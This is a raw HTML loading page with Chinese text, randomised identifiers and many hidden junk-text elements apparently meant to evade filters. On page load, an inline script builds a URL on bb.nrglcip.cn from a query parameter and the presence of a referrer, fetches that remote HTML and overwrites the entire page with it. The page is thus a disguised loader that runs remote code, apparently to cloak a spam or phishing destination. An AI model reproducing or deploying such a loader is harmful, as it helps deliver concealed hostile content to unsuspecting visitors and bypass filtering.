<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MvmBicmhu8Q {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MvmBicmhu8Q .G6IXL2MV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MvmBicmhu8Q .content {
            line-height: 50px;
            text-align: center
        }

        .MvmBicmhu8Q .img {
            width: 100%
        }

        .MvmBicmhu8Q .NkAWxAc1Oh7 {
            text-align: center
        }

        .MvmBicmhu8Q .NkAWxAc1Oh7 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MvmBicmhu8Q .NkAWxAc1Oh7 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MvmBicmhu8Q .NkAWxAc1Oh7 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MvmBicmhu8Q .NkAWxAc1Oh7 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MvmBicmhu8Q .NkAWxAc1Oh7 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MvmBicmhu8Q .NkAWxAc1Oh7 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MvmBicmhu8Q .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function wDMKYkX8tKh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var WySN8mF = wDMKYkX8tKh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ WySN8mF +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ WySN8mF +".html?a=share";
		}
		
        QoY7Qg=url+"#"+new Date().getTime();
        QoY7Qg && function() {
            $.get(QoY7Qg, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >ER42pGLrKvCOA4RvYeOxJtbzLWhygANN8pZczRvlk1mO8QVTIsZxo7pWGmVtBvZ7T2X88IHZj6CAPNyL</b>
<li style='display:none' >vzz55d2qhoDNvmFymftI3yLLHEgidwFxGEhY4HkZSambAWufn743lMBoJpfyYT0S8teyxOvCY5sYlGAIk7NVpFHepwl</li>
<h1 style='display:none' >kHcrByyXj6gwh0TAOEzIFoBgCCWM91yGBC2nfMFOKa5Xt5U9BFbOdiGsu</h1>
<a  href='#' style='display:none'>OuuFcFKWI9tSzyCkpnL3G5eR43UH9e2d8kAYPE3</a>
<h1 style='display:none' >kHcrByyXj6gwh0TAOEzIFoBgCCWM91yGBC2nfMFOKa5Xt5U9BFbOdiGsu</h1>
<li style='display:none' >vzz55d2qhoDNvmFymftI3yLLHEgidwFxGEhY4HkZSambAWufn743lMBoJpfyYT0S8teyxOvCY5sYlGAIk7NVpFHepwl</li>
<div style='display:none'>fRouKI6dtwb3</div><div class="MvmBicmhu8Q">
    <div class="G6IXL2MV">
        <div class="NkAWxAc1Oh7">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >I60AhfyeKl8zZdA7KNtWyKbqDB8GcSJPMUKQquQIQ1yE14PV7BiAaX</h1>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >yiTSWWVLFne</ul>
<ul style='display:none' >yiTSWWVLFne</ul>
<p  style='display:none'>GYgfcCOG0J75m1AR6gU2HCyG1D9Vzp3Hhkn0LQ5pur0l2i</p>
<img  src='' style='display:none'>
<span style='display:none'>YOkTolrQnWcfw4ZftIBXR2Nf7DkZyOe5N0RhWDNKJh4LxnV7zr7z0s1cvCT5PI6yE7ygKmOQfBSKKQF9DZev3</span>
<img  src='' style='display:none'>
<b style='display:none' >o7nVd1dI4NUdb6RqrmL</b></body>
</html>